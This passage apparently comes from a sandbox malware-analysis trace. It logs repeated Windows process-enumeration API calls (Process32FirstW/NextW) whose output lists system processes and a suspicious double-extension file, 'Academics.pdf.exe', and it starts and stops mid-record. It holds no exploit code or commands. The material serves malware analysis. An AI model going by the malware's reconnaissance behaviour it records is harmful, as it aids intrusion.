th32ModuleID=0x0, cntThreads=0xa, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0317.189] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x298, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0317.190] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x2cc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x12, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0317.191] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x334, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x12, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0317.191] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x36c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1e, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0317.192] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x3a8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x2cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="audiodg.exe")) returned 1 [0317.193] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x3f8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x9, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0317.194] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x124, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xe, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0317.194] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x448, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x3, th32ParentProcessID=0x334, pcPriClassBase=8, dwFlags=0x0, szExeFile="dwm.exe")) returned 1 [0317.195] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x45c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1a, th32ParentProcessID=0x440, pcPriClassBase=8, dwFlags=0x0, szExeFile="explorer.exe")) returned 1 [0317.196] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x480, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xc, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="spoolsv.exe")) returned 1 [0317.197] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x4ac, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xa, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="taskhost.exe")) returned 1 [0317.197] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x4d4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x12, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0317.198] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x7d4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="advised-cleaners-junction.exe")) returned 1 [0317.199] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x7b4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="thy-transaction-css.exe")) returned 1 [0317.200] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x56c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="says_settlement.exe")) returned 1 [0317.201] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x774, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="katie.exe")) returned 1 [0317.201] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x688, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="choosing.exe")) returned 1 [0317.202] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x7cc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="pmc.exe")) returned 1 [0317.203] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x7e0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="sansruled.exe")) returned 1 [0317.204] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x508, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="platform.exe")) returned 1 [0317.204] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x40c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="student.exe")) returned 1 [0317.205] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xc4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="deployment.exe")) returned 1 [0317.206] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x114, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="close.exe")) returned 1 [0317.207] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x684, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="reviewerbedrooms.exe")) returned 1 [0317.208] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x5d8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="lb_indigenous_neighborhood.exe")) returned 1 [0317.208] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x288, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="ghana-after.exe")) returned 1 [0317.209] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x5a8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="perfect tries.exe")) returned 1 [0317.210] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x6f4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="flexible.exe")) returned 1 [0317.211] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x738, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="secrets cas finding.exe")) returned 1 [0317.211] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x618, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="width cleared.exe")) returned 1 [0317.212] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x820, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x254, pcPriClassBase=8, dwFlags=0x0, szExeFile="WmiPrvSE.exe")) returned 1 [0317.213] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x898, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0317.214] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x8f0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="sppsvc.exe")) returned 1 [0317.214] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x90c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xc, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0317.215] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xb0c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="Academics.pdf.exe")) returned 1 [0317.216] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xb0c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="Academics.pdf.exe")) returned 0 [0317.217] CloseHandle (hObject=0x294) returned 1 [0317.217] PeekMessageW (in: lpMsg=0x8bf970, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf970) returned 0 [0317.217] PeekMessageW (in: lpMsg=0x8bf970, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf970) returned 0 [0317.217] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x294 [0317.219] Process32FirstW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0317.220] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x51, th32ParentProcessID=0x0, pcPriClassBase=8, dwFlags=0x0, szExeFile="System")) returned 1 [0317.220] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x104, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x4, pcPriClassBase=11, dwFlags=0x0, szExeFile="smss.exe")) returned 1 [0317.221] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x148, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x140, pcPriClassBase=13, dwFlags=0x0, szExeFile="csrss.exe")) returned 1 [0317.222] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x17c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x3, th32ParentProcessID=0x140, pcPriClassBase=13, dwFlags=0x0, szExeFile="wininit.exe")) returned 1 [0317.223] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x188, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x174, pcPriClassBase=13, dwFlags=0x0, szExeFile="csrss.exe")) returned 1 [0317.224] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1b0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x3, th32ParentProcessID=0x174, pcPriClassBase=13, dwFlags=0x0, szExeFile="winlogon.exe")) returned 1 [0317.224] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1cc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x17c, pcPriClassBase=9, dwFlags=0x0, szExeFile="services.exe")) returned 1 [0317.225] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1d4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x17c, pcPriClassBase=9, dwFlags=0x0, szExeFile="lsass.exe")) returned 1 [0317.226] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1dc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x9, th32ParentProcessID=0x17c, pcPriClassBase=8, dwFlags=0x0, szExeFile="lsm.exe")) returned 1 [0317.227] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x254, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xa, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0317.228] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x298, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0317.228] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x2cc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x12, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0317.229] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x334, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x12, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0317.230] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x36c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1e, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0317.231] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x3a8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x2cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="audiodg.exe")) returned 1 [0317.231] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x3f8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x9, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0317.232] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x124, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xe, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0317.233] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x448, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x3, th32ParentProcessID=0x334, pcPriClassBase=8, dwFlags=0x0, szExeFile="dwm.exe")) returned 1 [0317.234] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x45c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1a, th32ParentProcessID=0x440, pcPriClassBase=8, dwFlags=0x0, szExeFile="explorer.exe")) returned 1 [0317.235] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x480, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xc, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="spoolsv.exe")) returned 1 [0317.235] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x4ac, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xa, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="taskhost.exe")) returned 1 [0317.236] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x4d4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x12, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0317.237] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x7d4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="advised-cleaners-junction.exe")) returned 1 [0317.238] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x7b4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="thy-transaction-css.exe")) returned 1 [0317.238] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x56c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="says_settlement.exe")) returned 1 [0317.239] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x774, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="katie.exe")) returned 1 [0317.240] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x688, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="choosing.exe")) returned 1 [0317.241] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x7cc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="pmc.exe")) returned 1 [0317.242] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x7e0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="sansruled.exe")) returned 1 [0317.243] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x508, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="platform.exe")) returned 1 [0317.243] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x40c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="student.exe")) returned 1 [0317.244] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xc4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="deployment.exe")) returned 1 [0317.245] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x114, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="close.exe")) returned 1 [0317.246] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x684, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="reviewerbedrooms.exe")) returned 1 [0317.246] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x5d8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="lb_indigenous_neighborhood.exe")) returned 1 [0317.247] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x288, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="ghana-after.exe")) returned 1 [0317.248] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x5a8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="perfect tries.exe")) returned 1 [0317.249] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x6f4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="flexible.exe")) returned 1 [0317.250] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x738, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="secrets cas finding.exe")) returned 1 [0317.250] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x618, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="width cleared.exe")) returned 1 [0317.251] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x820, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x254, pcPriClassBase=8, dwFlags=0x0, szExeFile="WmiPrvSE.exe")) returned 1 [0317.252] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x898, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0317.253] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x8f0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="sppsvc.exe")) returned 1 [0317.253] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x90c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xc, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0317.254] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xb0c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="Academics.pdf.exe")) returned 1 [0317.255] Process32NextW (in: 